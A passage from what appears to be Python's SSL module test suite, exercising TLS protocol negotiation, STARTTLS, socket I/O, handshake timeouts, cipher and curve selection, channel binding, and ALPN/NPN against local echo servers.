try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
